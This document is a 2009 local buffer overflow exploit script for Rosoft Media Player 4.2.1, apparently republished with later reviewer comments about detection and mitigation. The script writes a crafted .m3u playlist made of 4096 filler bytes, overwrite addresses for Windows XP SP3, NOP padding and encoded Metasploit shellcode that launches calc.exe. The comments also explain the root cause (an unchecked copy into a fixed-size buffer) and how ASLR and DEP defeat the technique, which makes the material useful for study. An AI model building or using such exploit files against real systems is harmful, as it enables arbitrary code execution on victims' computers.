
# Title : Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit
# Published : 2009-01-06
# Author : Encrypt3d.M!nd


# Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit(0-day)
# By:Encrypt3d.M!nd
#
# Well, there is a buffer overflow in the program where all the supported types are
# affected (m3u, rml, txt). Rosoft Media Player also treats all other types as txt, so
# those types are affected too :), and all versions are affected as well
#
# Greetz:-=Mizo=-,L!ON,El Mariachi,MiNi SpIder,and all my friends
# I'm Iraqian...Not Arabian



# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
#
# Payload blob produced by the Metasploit generator named on the line above.
# Per that line its only action is to start calc.exe, i.e. it serves as a
# visible proof-of-execution marker, and it is wrapped by the PexFnstenvSub
# encoder (stated size: 164 bytes).
# NOTE(review): because the payload is encoder-wrapped, the command string
# presumably does not appear in clear inside the generated file. Detection is
# better keyed on the file's structure (a playlist holding one very long
# unbroken run followed by non-text data) than on a literal "calc.exe" match.
# The adjacent string literals below are concatenated by Python into a single
# string; the text is kept exactly as it appears on the page.
shellcode = (
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9"
"x21xdbx5bx83xebxfcxe2xf4x55xc9x9fx5bxa9x21x50x1e"
"x95xaaxa7x5exd1x20x34xd0xe6x39x50x04x89x20x30x12"
"x22x15x50x5ax47x10x1bxc2x05xa5x1bx2fxaexe0x11x56"
"xa8xe3x30xafx92x75xffx5fxdcxc4x50x04x8dx20x30x3d"
"x22x2dx90xd0xf6x3dxdaxb0x22x3dx50x5ax42xa8x87x7f"
"xadxe2xeax9bxcdxaax9bx6bx2cxe1xa3x57x22x61xd7xd0"
"xd9x3dx76xd0xc1x29x30x52x22xa1x6bx5bxa9x21x50x33"
"x95x7exeaxadxc9x77x52xa3x2axe1xa0x0bxc1xd1x51x5f"
"xf6x49x43xa5x23x2fx8cxa4x4ex42xbax37xcax0fxbex23"
"xccx21xdbx5b")

# Name of the playlist file this script writes. The advisory text at the top
# of the page states that m3u, rml and txt inputs (and any other type, which
# the player treats as txt) are all affected, so the file extension is not a
# reliable filter for defenders.
File = 'encrypt3d.m3u' # author's note: change it to whatever you like

# Four-byte value the author labels as an address inside user32.dll on
# Windows XP SP3. NOTE(review): going by the variable name this is presumably
# the value intended to replace the saved return address -- confirm. A
# hard-coded module address only holds where that module loads at a fixed
# base, which is why ASLR (not available on XP) breaks this class of overwrite.
eip = "x6Bx8Cx49x7E" # Windows XP SP3:user32.dll

# 4096 filler characters placed ahead of the address fields.
# NOTE(review): the page does not state the size of the overflowed buffer;
# presumably this is the distance to the overwritten stack data -- confirm.
chars = "A"*4096

# Author's note, kept as given: a writable address that contains 0, chosen so
# that the address value itself has no 0x00 byte.
addr = "xF0xFFxFDx7F" # Writeable address contains 0,NOT 0x00

# Alternative value the author suggests when the address above does not work.
#addr = "xE0x0Fx70x12" # if the address above not workin try this one

# Write everything as one line with no trailing newline, in this order:
# filler, addr, "x90"*4, eip, "x90"*10, payload ("x90" is presumably x86 NOP
# padding). The handle is named `file`, which shadows the Python 2 builtin.
# Defensive takeaways: the root fix belongs in the player, which presumably
# copies a playlist line into a fixed-size buffer without a length check --
# the line length must be bounded before the copy. Stack cookies, DEP and ASLR
# make a fixed-address overwrite like this one unreliable on later Windows
# builds. For triage, a playlist or text file consisting of a single
# multi-kilobyte run of one character followed by non-text data is anomalous
# and worth flagging.
file=open(File,'w')
file.write(chars+addr+"x90"*4+eip+"x90"*10+shellcode)
file.close()
